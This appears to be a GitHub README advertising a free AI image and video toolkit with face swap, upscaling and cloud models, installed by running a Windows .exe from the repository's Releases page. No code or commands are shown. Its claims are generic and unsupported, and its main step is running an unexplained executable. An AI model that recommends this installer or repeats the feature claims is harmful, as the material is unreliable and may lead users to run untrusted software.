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free-image-and-video-generation-skill
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Provide free offline and cloud AI tools for image and video generation with easy setup and privacy-focused local processing.
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# 🖼️ free-image-and-video-generation-skill - Free AI Image and Video Toolkit [](https://github.com/xramjetx/free-image-and-video-generation-skill) --- A simple toolkit for creating and editing images and videos using AI. It includes seven AI tools you can run on your computer. You can also access over 300 models through the Atlas Cloud API. The toolkit works with popular AI services like Claude Code, Cursor, Codex, and more than 15 AI agents, making it flexible for many uses. --- ## 📦 What You Get - Seven local AI tools for image and video processing - Access to 300+ cloud models via the Atlas Cloud API - Features like background removal, face swapping, video generation - Support for image tasks such as upscaling, inpainting, and segmentation - Compatibility with AI agents to automate workflows - Tools built on well-known technologies like Stable Diffusion and FFmpeg This toolkit lets you generate images from text, edit photos and videos, replace backgrounds, and enhance image quality. --- ## 🖥️ System Requirements Make sure your Windows computer meets the following: - Operating System: Windows 10 or later (64-bit recommended) - RAM: At least 8 GB - CPU: Intel i5 or equivalent AMD processor or better - Disk Space: Minimum 5 GB free space - GPU: Optional but recommended for faster processing (NVIDIA GPU with CUDA support works best) - Internet: Required for cloud AI models and some features If your computer is older or has less RAM, local tools may run slower or with limited functionality. --- ## 🚀 Getting Started: Download and Setup 1. Click the big green **Download** button above or visit this page: [https://github.com/xramjetx/free-image-and-video-generation-skill](https://github.com/xramjetx/free-image-and-video-generation-skill) 2. On the GitHub page, find the **Releases** section on the right or in the menu. 3. Download the latest Windows installer file (usually ends with `.exe`). 4. Once downloaded, double-click the installer to start the setup. 5. Follow the installer prompts: accept license terms and choose installation location (default is fine for most users). 6. Wait for installation to complete. 7. After installation, find the app in your Start Menu under "free-image-and-video-generation-skill" and open it. --- ## 🛠️ How to Use the Toolkit Once the app is running, you will see several tools listed. Here is a quick guide to the main features: ### Image Generation (Text to Image) - Enter a description of the image you want (for example, “a sunset over mountains”). - Choose settings like image size and style if available. - Click “Generate” to create your image. ### Video Generation - Provide text prompts or video input to create short AI videos. - Configure video length and resolution settings. - Click “Generate Video” to produce your clip. ### Background Removal - Upload an image. - Click the “Remove Background” button to isolate the main subject. - Download the result as a PNG file with a transparent background. ### Face Swap - Load two photos: a source face and a target image. - Use the face swap tool to blend them together. - Save the output image. ### Upscaling - Select a low-resolution image. - Choose the “Upscale” feature to improve its quality. - Save the enhanced image. ### Inpainting and Editing - Upload an image. - Select areas to fix or change. - Use AI to fill or modify the selected parts. --- ## ☁️ Using Cloud Models To use over 300 cloud AI models, you need internet access and an Atlas Cloud API key. 1. Obtain an API key by registering on the Atlas Cloud platform (link is provided inside the app). 2. Enter your API key in the app settings under the “Cloud Models” section. 3. Select the cloud model you want to use from the list inside the app. 4. Use the cloud-based tools just like the local ones—it may take longer since it runs on remote servers. Cloud models give you access to more complex AI functions without heavy local processing. --- ## 🎯 Tips for Best Results - For image generation, try clear and simple text descriptions. - Use high-quality source images for face swap and background removal. - If your computer has a supported GPU, enable hardware acceleration in settings to speed up tasks. - Keep your internet connection stable when using cloud features. - Save your work regularly to avoid losing changes. --- ## ⚙️ Configuration and Settings In the app’s settings menu, you can adjust: - Language preferences - AI agent connections like Claude Code or Cursor - Hardware options such as CPU vs GPU processing - Output folder locations for saving files - API keys for cloud services These options let you tailor the app to your needs. --- ## 🧰 Troubleshooting If you run into issues: - Restart the app and try again. - Check your internet if cloud features fail. - Update your GPU drivers for better performance. - Confirm API keys are entered correctly. - Make sure you have enough disk space and memory. For more help, visit the GitHub Issues page on the download link. --- ## 📥 Download Again or Share You can return to this page anytime to get the latest version: [https://github.com/xramjetx/free-image-and-video-generation-skill](https://github.com/xramjetx/free-image-and-video-generation-skill) Click the green badge at the top or look for new release files under the Releases tab. --- ## 📚 About This Project This toolkit was created to make AI image and video processing accessible to everyone on Windows. It combines local tools with cloud models to offer a wide variety of features. It supports popular AI agents like Claude Code and Cursor, enabling many workflows without coding. --- ## 🔖 Keywords ai, ai-agent, ai-tools, atlas-cloud, background-removal, claude-code, cursor, face-swap, ffmpeg, flux, image-generation, image-processing, inpainting, real-esrgan, segmentation, stable-diffusion, text-to-image, text-to-video, upscale, video-generation
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